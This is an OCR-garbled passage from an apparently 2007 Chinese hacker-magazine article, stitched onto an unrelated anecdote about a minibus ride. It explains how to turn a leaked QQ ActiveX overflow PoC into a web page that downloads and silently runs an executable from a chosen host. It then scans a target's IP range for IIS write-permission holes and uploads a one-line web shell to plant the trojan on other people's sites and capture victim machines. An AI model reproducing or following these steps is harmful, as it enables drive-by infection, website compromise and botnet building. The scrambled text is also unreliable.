如发现有乱码，请点击下面链接浏览原文
正文摘录:

豢鬻瓣浚激上期欠钱说过加班太晚末班车没了就只能坐黑巴(小巴士)回家，结果另一个小编不小心加班到11点回家的时候，也找不到公交车。TA×I太贵，于是也上了次“贼”车。未曾想到，这辆缺胳膊少腿的黑巴上还有音响，非常大声的放着背景音乐“crazyFrog”，过了会还开始报告“亲爱的旅客们，本车作为报废车，在司机的精心爱护下，又安全行驶了1O年.请大家跟司机一样爱惜本车，不要大声说话，规律性咳嗽，以免引起共振损坏车子……”。当小编从车上下来之后，第一件事就是打电话给家人报平安一一远在家9的父母其实是很牵刚过元旦，国内著名的安拿小组“幻影旅团”就弄了个“迎接2O07元旦”发漏洞的活动，一下子发布了诸多早已私下流传在民间的Oday漏洞和利用工具，包括讯雷漏洞、winzip漏洞、QQ远程溢出漏洞和UC远程溢出漏洞等。对于菜鸟，最关心的莫过于QQ和UC的远程溢出漏洞了。一、QQ远程溢出漏洞QQ在安装的时候，会在系统里注册一个Activex组件，问题就发生在这些组件}：。只墨H{户安装过QQ，任使用IE浏览器的时候就可以根据“cLAssID-CLsID：{AC3A36A89BFF410AA33D2279FFEB69D2}”调用并触发该漏洞。说简单点，就是不需要用户登录QQ，也能触发漏洞。腾汛QQ2006正式版及之前所有版本(未升级2O07.1.1补‘_r前)都能被利用。利用幻影组织发布的PoC编译成qqO(1ayexp.exe后，在CMD卜输入qqodayexp.exe可以看到这个工具的利用方法，如图l。图1使用方法很简单，是一个下载并运行指定文件的网页木马。我们为了测试它的有效性，首先找一个叮以直接下载的exe文件地址，比如http：／／192.168.O.123／1.exe(一般是自已申请一。个FTI’空间将exe文件f：传，例如x档案免费提供的水晶FTP宅间)，在命令行下输入：qqodayexp.exehttp：／／192.168.O.123／1.exeqq.html，就可以生成一个qq.html文什。打开这个qq.html，电脑就会去下载http：／／192.168.0.123／1.exe并在后台自动运行1.exe了。虽然这个网马运行起来稍稍有点膏，不过比起其它暴力扩大内存的马儿来说，已经强了很多。程溢出嘲≯拜年二、快速入侵找websheIl挂马刚才是在本地测试成功了，这没有什么意思，没有谁愿意做个马儿自己“享用”，肯定想把它挂出去抓点肉鸡。那么我们还需要配置一个传统的特洛伊木马，你可以选择灰鸽子这种老牌木马，也可以选择本期杂志介绍的蓝蝴蝶，这都不是本文的重点。重点是怎么样快速的得到webshell，并把网页木马挂到别人的网站上。为了最快速的找到webshelI，我选择的是IIS写权限漏洞扫描工具。找一个人气还比较旺的黑客网站www.hack料.cn，在CMD中输入命令pingwww.hack$·.cn得到它的IP地址是218.246.}.75，接着我在lIs写权限漏洞利用工具的起始IP地址填写2l8.246.}.1，结束地址填写2l8.246.}.254，勾上“Tryonothersystem”以免有些站长改变了HTTPbanner工具就不去尝试上传了。单击“scan”按钮不一会就扫出一个红色感叹号的IP，看来有戏，如图2。迅速拿}{J桂林老兵的IIs写权限卜传工具，把“域名”处改为刚扫到的IP地址218.246.}.97，然后在左边的下拉框里选中PUT。这时工具自动弹出了文件浏览对话框，挑中一个短小精悍的海阳顶端一句话木